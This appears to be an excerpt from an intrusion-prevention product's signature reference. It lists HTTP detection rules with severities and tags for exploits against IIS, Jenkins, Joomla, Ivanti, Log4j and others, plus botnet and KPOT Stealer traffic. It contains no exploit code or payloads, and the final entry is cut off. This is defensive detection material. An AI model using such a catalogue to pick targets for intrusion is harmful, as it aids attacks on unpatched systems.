About this situation: Detects the upload of ASP files with extensively long filenames as includes
Context: HTTP Client Stream
Severity: 7
Tags: Windows, x86, IIS, MS2002, CVE2002, Windows not specific, IIS not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP-IIS-Asp-Server-Side-Include-Function-Vulnerability
Description:
Back to top

HTTP_CS-IIS-Fp-BOF-MS03-051

About this situation: IIS FrontPage Server Extension Buffer Overflow
Context: HTTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, IIS, FrontPage Server Extensions 2002, FrontPage Server Extensions 2000, MS2003, CVE2003, Windows not specific, IIS not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: FrontPage-Fp30reg-DLL-BOF-MS03-051
Description:
Back to top

HTTP_CS-IIS-HTMLEncode-BOF-MS08-006-1

About this situation: Detects attacks exploiting vulnerable asp page in IIS
Context: HTTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, IIS, MS2008-02, CVE2008, Windows not specific, IIS not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-168-2032
Last changed: sgpkg-ips-168-2032
Vulnerability: HTTP-IIS-HTMLEncode-BOF-MS08-006
Description:
Back to top

HTTP_CS-IIS-HTMLEncode-BOF-MS08-006-2

About this situation: Detects attacks exploiting vulnerable asp page in IIS
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, IIS, MS2008-02, CVE2008, Windows not specific, IIS not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-247-3038
Last changed: sgpkg-ips-247-3038
Vulnerability: HTTP-IIS-HTMLEncode-BOF-MS08-006
Description:
Back to top

HTTP_CS-IIS-Isapi-Dot-Printer-BOF

About this situation: IIS Isapi Dot Printer Buffer Overflow
Context: HTTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, IIS, MS2001, CVE2001, Windows not specific, IIS not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-72-1314
Last changed: sgpkg-ips-483-5211
Vulnerability: HTTP-IIS-Isapi-Dot-Printer-BOF
Description:
Back to top

HTTP_CS-IIS-Isapi-Windows-Media-Services-BOF-1

About this situation: Buffer overflow attempt of IIS Isapi Extension for Windows Media Services
Context: HTTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, IIS, Windows Media Services, MS2003, CVE2003, Windows not specific, IIS not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1618-5242
Vulnerability: IIS-Isapi-Windows-Media-Services-BOF-MS03-019
Description:
Back to top

HTTP_CS-IIS-Ntdll-WebDAV-BOF

About this situation: Remote system compromise using IIS/WebDAV buffer overflow
Context: HTTP Client Stream
Severity: 10
Tags: Windows XP, Windows NT, Windows 2000, Any Hardware, IIS 5.0, MS2003, CVE2003, Windows XP not specific, Windows NT not specific, Windows 2000 not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1188-5242
Vulnerability: HTTP-IIS-Ntdll-WebDAV-BOF
Description:
Back to top

HTTP_CS-IIS-Server-WebDAV-Xml-Request-DoS-MS04-030

About this situation: Detects WebDAV PROPFIND requests with XML elements with a large amount of elements
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, IIS 5.0, IIS 5.1, IIS 6.0, MS2004-10, CVE2003, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1618-5242
Vulnerability: MS-IIS-Server-WebDAV-Xml-Request-DoS-MS04-030
Description:
Back to top

HTTP_CS-Imagemagick-EXIF-Resolutionunit-Handling-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in ImageMagick detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-498-5211
Vulnerability: Imagemagick-EXIF-Resolutionunit-Handling-Memory-Corruption
Description:
Back to top

HTTP_CS-Imagemagick-Psd-File-Channel-Buffer-Vulnerability-Upload

About this situation: Invalid PSD file upload detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Psd-Imagemagick-Psd-File-Channel-Buffer-Vulnerability
Description:
Back to top

HTTP_CS-Index-Directory-Disclosure-Attempt

About this situation: Netscape Enterprise Server Index Disclosure
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Netscape Enterprise Server, CVE2001, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Netscape-Enterprise-Server-Index-Disclosure-Vulnerability
Description:
Back to top

HTTP_CS-Inductive-Automation-Ignition-Authenticatedpage-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Inductive Automation Ignition detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Inductive Automation Ignition, CVE2022, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1562-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Inductive-Automation-Ignition-Authenticatedpage-Authentication-Bypass
Description:
Back to top

HTTP_CS-Inductive-Automation-Ignition-Servermessageheader-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Inductive Automation Ignition detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Inductive Automation Ignition, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1580-5242
Vulnerability: Inductive-Automation-Ignition-Servermessageheader-Insecure-Deserialization
Description:
Back to top

HTTP_CS-Intelliants-Subrion-CMS-Authenticated-File-Upload-Bypass-To-RCE

About this situation: An attempt to exploit a vulnerability in Subrion CMS detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Subrion CMS, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1677-5242
Last changed: sgpkg-ips-1677-5242
Vulnerability: Intelliants-Subrion-CMS-Authenticated-File-Upload-Bypass-To-RCE
Description:
Back to top

HTTP_CS-Invalid-Value-After-Request-Method

About this situation: Invalid value after HTTP request method was detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-633-5211
Description:
Back to top

HTTP_CS-Invision-Power-Board-PHP-Remote-Code-Execution

About this situation: A PHP remote code execution vulnerability in Invision Power Board detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Invision Power Board, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-660-5211
Vulnerability: Invision-Power-Board-PHP-Remote-Code-Execution
Description:
Back to top

HTTP_CS-ISPConfig-Remote-Command-Execution

About this situation: ISPConfig Remote Command Execution detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ISPConfig, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-695-5211
Vulnerability: ISPConfig-Remote-Command-Execution
Description:
Back to top

HTTP_CS-Ivanti-Avalanche-Remote-Control-Server-Updateskin-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Vulnerability: Ivanti-Avalanche-Remote-Control-Server-Updateskin-Directory-Traversal
Description:
Back to top

HTTP_CS-Ivanti-Avalanche-Securefilter-Dofilter-CVE-2024-47009-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability Ivanti Avalanche detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2024, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1844-5242
Last changed: sgpkg-ips-1844-5242
Vulnerability: Ivanti-Avalanche-Securefilter-Dofilter-CVE-2024-47009-Authentication-Bypass
Description:
Back to top

HTTP_CS-Ivanti-Cloud-Services-Application-SendAlert-Command-Injection-CVE-2024-47908

About this situation: An attempt to exploit a vulnerability in Ivanti Cloud Services Appliance detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Cloud Services Appliance, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Ivanti-Cloud-Services-Application-SendAlert-Command-Injection-CVE-2024-47908
Description:
Back to top

HTTP_CS-Ivanti-Connect-Secure-Remote-Code-Execution-CVE-2025-0282

About this situation: An attempt to exploit a vulnerability in Ivanti Connect Secure detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Connect Secure, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1825-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: Ivanti-Connect-Secure-Remote-Code-Execution-CVE-2025-0282
Description:
Back to top

HTTP_CS-Jenkins-Ci-Server-Localedrivenresourceselector-Arbitrary-File-Read

About this situation: An attempt to exploit a vulnerability in Jenkins Jenkins detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1092-5242
Vulnerability: Jenkins-Ci-Server-Localedrivenresourceselector-Arbitrary-File-Read
Description:
Back to top

HTTP_CS-Jenkins-Ci-Server-Multiple-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Jenkins Jenkins detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2017, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-1782-5242
Vulnerability: Jenkins-Ci-Server-Multiple-Cross-Site-Request-Forgery
Description:
Back to top

HTTP_CS-Jenkins-Ci-Server-Xstream-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Jenkins Jenkins detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-769-5211
Vulnerability: Jenkins-Ci-Server-Xstream-Insecure-Deserialization
Description:
Back to top

HTTP_CS-Jenkins-Core-CLI-Cross-Site-WebSocket-Hijacking-CVE-2024-23898

About this situation: An attempt to exploit a vulnerability in Jenkins detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1686-5242
Last changed: sgpkg-ips-1688-5242
Vulnerability: Jenkins-Core-CLI-Cross-Site-WebSocket-Hijacking-CVE-2024-23898
Description:
Back to top

HTTP_CS-Jenkins-Core-Fileparametervalue-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Jenkins detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: Jenkins-Core-Fileparametervalue-Directory-Traversal
Description:
Back to top

HTTP_CS-Jenkins-Core-JSON-Lib-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Jenkins Jenkins detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1820-5242
Last changed: sgpkg-ips-1820-5242
Vulnerability: Jenkins-Core-JSON-Lib-Denial-Of-Service
Description:
Back to top

HTTP_CS-Jenkins-Credentials-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Credentials Plugin detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins Credentials Plugin, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1469-5242
Last changed: sgpkg-ips-1469-5242
Vulnerability: Jenkins-Credentials-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Jenkins-Nuget-Plugin-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Jenkins Nuget Plugin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1358-5242
Vulnerability: Jenkins-Nuget-Plugin-External-Entity-Injection
Description:
Back to top

HTTP_CS-Jenkins-Selenium-HTML-Report-Plugin-XML-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Jenkins Selenium HTML Report Plugin detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins Selenium HTML Report Plugin, CVE2021, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Vulnerability: Jenkins-Selenium-HTML-Report-Plugin-XML-External-Entity-Injection
Description:
Back to top

HTTP_CS-Joomla-Arbitrary-File-Upload

About this situation: An attempt to exploit a Joomla Arbitrary File Upload vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1570-5242
Vulnerability: Joomla-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Joomla-CMS-CleanTags-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Joomla CMS detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1706-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: Joomla-CMS-CleanTags-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Joomla-CMS-Policy-Bypass-And-Privilege-Escalation-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Joomla detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-819-5242
Vulnerability: Joomla-CMS-Policy-Bypass-And-Privilege-Escalation-Vulnerabilities
Description:
Back to top

HTTP_CS-Joomla-TinyBrowser-File-Upload-Code-Execution

About this situation: An attempt to exploit a Joomla TinyBrowser File Upload Code Execution vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, TinyBrowser, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Vulnerability: Joomla-TinyBrowser-File-Upload-Code-Execution
Description:
Back to top

HTTP_CS-Kelihos-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-571-5211
Vulnerability: Kelihos-Botnet
Description:
Back to top

HTTP_CS-Keysight-N6854a-And-N6841a-RF-Sensor-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in KeySight N6854A and N6841A RF detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, KeySight N6854A and N6841A RF, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1476-5242
Last changed: sgpkg-ips-1476-5242
Vulnerability: Keysight-N6854a-And-N6841a-RF-Sensor-Insecure-Deserialization
Description:
Back to top

HTTP_CS-KPOT-Stealer-Traffic

About this situation: KPOT Stealer traffic was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1254-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: KPOT-Stealer-Traffic
Description:
Back to top

HTTP_CS-Kubernetes-API-Proxy-Request-Handling-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Kubernetes Kubernetes detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Kubernetes, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1123-5242
Vulnerability: Kubernetes-API-Proxy-Request-Handling-Privilege-Escalation
Description:
Back to top

HTTP_CS-Labview-Web-Server-Denial-Of-Service

About this situation: A vulnerability in Labview Web Server
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, Labview Server, Windows not specific, Linux not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Vulnerability: Labview-Web-Server-Denial-Of-Service
Description:
Back to top

HTTP_CS-LANDesk-ThinkManagement-Suite-ServerSetup.asmx-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in LANDesk Lenovo ThinkManagement Suite detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LANDesk Lenovo ThinkManagement Suite, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-925-5242
Vulnerability: LANDesk-ThinkManagement-Suite-ServerSetup.asmx-Directory-Traversal
Description:
Back to top

HTTP_CS-LANDesk-ThinkManagement-Suite-SetTaskLogByFile-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in LANDesk Lenovo ThinkManagement Suite detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LANDesk Lenovo ThinkManagement Suite, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-449-4219
Last changed: sgpkg-ips-1784-5242
Vulnerability: LANDesk-ThinkManagement-Suite-SetTaskLogByFile-Arbitrary-File-Deletion
Description:
Back to top

HTTP_CS-Lansweeper-Assetactions-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Lansweeper lansweeper detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lansweeper, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1546-5242
Last changed: sgpkg-ips-1546-5242
Vulnerability: Lansweeper-Assetactions-Directory-Traversal
Description:
Back to top

HTTP_CS-Large-Number-Of-Parameters-In-POST-Request

About this situation: HTTP POST request contained a very large number of parameters
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, MS2010-09, MS2011-12, CVE2010, CVE2011, CVE2012, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-439-4219
Last changed: sgpkg-ips-439-4219
Vulnerability: Microsoft-IIS-Repeated-Parameter-Request-Denial-Of-Service
Microsoft-ASP.NET-Hash-Collision-Denial-Of-Service
Oracle-Multiple-Products-Hash-Collision-Denial-of-Service
PHP-Php_Register_Variable_ex-Function-Code-Execution
Description:
Back to top

HTTP_CS-Lethic-Activity

About this situation: Lethic activity detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Lethic
Description:
Back to top

HTTP_CS-LG-Simple-Editor-Deletechecksession-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in LG Simple Editor detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LG Simple Editor, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: LG-Simple-Editor-Deletechecksession-Directory-Traversal
Description:
Back to top

HTTP_CS-LG-Simple-Editor-Deletefolder-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in LG Simple Editor detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LG Simple Editor, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1638-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: LG-Simple-Editor-Deletefolder-Directory-Traversal
Description:
Back to top

HTTP_CS-LG-Simple-Editor-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in LG Simple Editor detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, LG Simple Editor, CVE2023, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Vulnerability: LG-Simple-Editor-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Libpng-PNG-Decompress-Chunk-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in PNG Development Group libpng detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libpng, CVE2011, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-1844-5242
Vulnerability: Libpng-PNG-Decompress-Chunk-Integer-Overflow
Libpng-PNG-Inflate-Buffer-Overflow
Description:
Back to top

HTTP_CS-LibreNMS-API-Token-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in LibreNMS
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Vulnerability: LibreNMS-API-Token-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-LibreNMS-Usercontroller.php-Username-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in LibreNMS LibreNMS detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1594-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: LibreNMS-Usercontroller.php-Username-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Lighttpd-Mod_FastCGI-Extension-Cgi-Variable-Overwriting-Vulnerability

About this situation: An attempt to exploit a vulnerability in Lighttpd Project Lighttpd detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lighttpd, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-603-5211
Vulnerability: Lighttpd-Mod_FastCGI-Extension-Cgi-Variable-Overwriting-Vulnerability
Description:
Back to top

HTTP_CS-LimeSurvey-Zip-Path-Traversals

About this situation: An attempt to exploit a vulnerability in LimeSurvey detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LimeSurvey, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1422-5242
Last changed: sgpkg-ips-1426-5242
Vulnerability: LimeSurvey-Zip-Path-Traversals
Description:
Back to top

HTTP_CS-Log4j-Denial-of-Service-CVE-2021-45105

About this situation: An attempt to exploit a vulnerability in Log4j detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation Log4j, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1420-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Log4j-Denial-of-Service-CVE-2021-45105
Description:
Back to top

HTTP_CS-Logback-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Logback detected
Context: HTTP Client Stream
Severity: 7
